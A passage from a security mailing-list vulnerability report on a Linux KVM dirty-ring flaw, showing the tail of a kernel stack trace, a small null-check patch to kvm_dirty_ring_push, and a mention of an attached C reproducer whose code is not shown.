 kvm\_arch\_vcpu\_destroy+0x76/0x290 arch/x86/kvm/x86.c:11219
 kvm\_vcpu\_destroy arch/x86/kvm/../../../virt/kvm/kvm\_main.c:441 \[inline\]
 kvm\_destroy\_vcpus+0x119/0x280 arch/x86/kvm/../../../virt/kvm/kvm\_main.c:460
 kvm\_free\_vcpus arch/x86/kvm/x86.c:11659 \[inline\]
 kvm\_arch\_destroy\_vm+0x22a/0x380 arch/x86/kvm/x86.c:11769
 kvm\_destroy\_vm arch/x86/kvm/../../../virt/kvm/kvm\_main.c:1217 \[inline\]
 kvm\_put\_kvm+0x3ff/0x900 arch/x86/kvm/../../../virt/kvm/kvm\_main.c:1250
 kvm\_vcpu\_release+0x4d/0x70 arch/x86/kvm/../../../virt/kvm/kvm\_main.c:3668
 \_\_fput+0x21b/0x940 fs/file\_table.c:317
 task\_work\_run+0xde/0x180 kernel/task\_work.c:164
 tracehook\_notify\_resume include/linux/tracehook.h:188 \[inline\]
 exit\_to\_user\_mode\_loop kernel/entry/common.c:175 \[inline\]
 exit\_to\_user\_mode\_prepare+0x14d/0x150 kernel/entry/common.c:207
 \_\_syscall\_exit\_to\_user\_mode\_work kernel/entry/common.c:289 \[inline\]
 syscall\_exit\_to\_user\_mode+0x1d/0x40 kernel/entry/common.c:300
 do\_syscall\_64+0x48/0x90 arch/x86/entry/common.c:86
 entry\_SYSCALL\_64\_after\_hwframe+0x44/0xae
------------\[ Patch \]------------
We try to do a patch, which can not make the poc trigger this flaw.
diff --git a/virt/kvm/dirty\_ring.c b/virt/kvm/dirty\_ring.c.patch
index 222ecc8..38f1b66 100644
--- a/virt/kvm/dirty\_ring.c
+++ b/virt/kvm/dirty\_ring.c.patch
@@ -154,6 +154,8 @@ void kvm\_dirty\_ring\_push(struct kvm\_dirty\_ring \*ring, u32 slot, u64 offset)
        /\* It should never get full \*/
        WARN\_ON\_ONCE(kvm\_dirty\_ring\_full(ring));

+       if (!ring->dirty\_gfns)
+               return;
        entry = &ring->dirty\_gfns\[ring->dirty\_index & (ring->size - 1)\];

        entry->slot = slot;


------------\[ Cut here \]------------
C repro and kernel config are attached.
Best regards.
    Yongkang Jia of Zhejiang University

**Content of type "**text/html**" skipped**

**View attachment "**poc.c**" of type "**text/plain**" (6534 bytes)**

**Download attachment "**config**" of type "**application/octet-stream**" (130642 bytes)**

Powered by blists - more mailing lists

Please check out the Open Source Software Security Wiki, which is counterpart to this mailing list.

Confused about mailing lists and their use? Read about mailing lists on Wikipedia and check out these guidelines on proper formatting of your messages.

Tag

#windows